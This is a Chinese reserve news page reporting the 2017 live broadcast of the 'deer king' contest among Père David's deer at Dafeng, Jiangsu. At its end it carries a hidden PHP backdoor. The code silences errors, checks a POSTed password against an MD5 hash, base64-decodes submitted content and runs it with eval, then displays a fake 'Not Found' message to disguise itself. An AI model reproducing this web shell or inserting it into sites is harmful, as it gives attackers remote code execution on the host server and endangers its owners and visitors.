最新要闻

首页 > 最新要闻 >

    2017鹿王争霸赛直播圆满落幕

           春夏之交,雨水充沛,这是植物旺盛生长的时令,也是动物繁衍后代的季节。在江苏大丰,有这样一群生物,平日性情温顺,甚至胆小怕人,但此时,为了争夺爱情的发言权,争夺家族的荣耀,他们展开了奋不顾身的厮杀,但求异性的一眼垂眸,但求三千群首的仰天一呼……

    每年五六月份都会上演“鹿王争霸”,荣登鹿王宝座的雄鹿,将会承担起这一年度种群的繁衍任务。谁载王者荣耀?

    2017618日上午9点整,江苏大丰麋鹿保护区中华麋鹿园上演了一场激情与爱情的厮杀战,600多头麋鹿在茫茫的湿地上争夺今年王位的宝座。

    为了更多了解麋鹿,此次争霸赛邀请到了盐城广播电视总台主持人于波、特别邀请到了国家濒危物种科学委员会常务副主任、野生动物保护协会副会长、中国科学院动物研究所蒋志刚教授以及江苏大丰麋鹿国家级自然保护区管理处副主任沈华坐客室外演播室为我们解读。

    经过激烈的角逐,一个小时的厮杀,我们共同见证了一年一度鹿王的诞生,延续着麋鹿种族优质的基因与传承。并通过电视荧屏感受到了麋鹿物种的神奇与珍贵,阳光下麋鹿在丛林中穿行,嗷嗷待哺的小鹿,尤其是欣赏到了公鹿争斗时那狰狞的鹿角,不得不让我们时时刻刻担心麋鹿会不会受伤。同时我们也欣赏到了大自然美丽的奇观、物种保护的奇迹以及麋鹿带给我们争霸的激情,非常的难能可贵。

    群体中鹿王已经产生,时间虽短,但意犹未尽。通过这样每年一次的鹿王争霸直播活动,我们可以让社会公众接近这神奇的物种,亲身感受那份快乐,尊重自然、顺应自然、保护自然,走生态优先、绿色发展之路。

    蒋教授表示,他参与鹿王争霸赛直播四次,这次大丰的鹿王争霸赛是他看到过的场面最宏观的一次,印象最深刻的一次。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>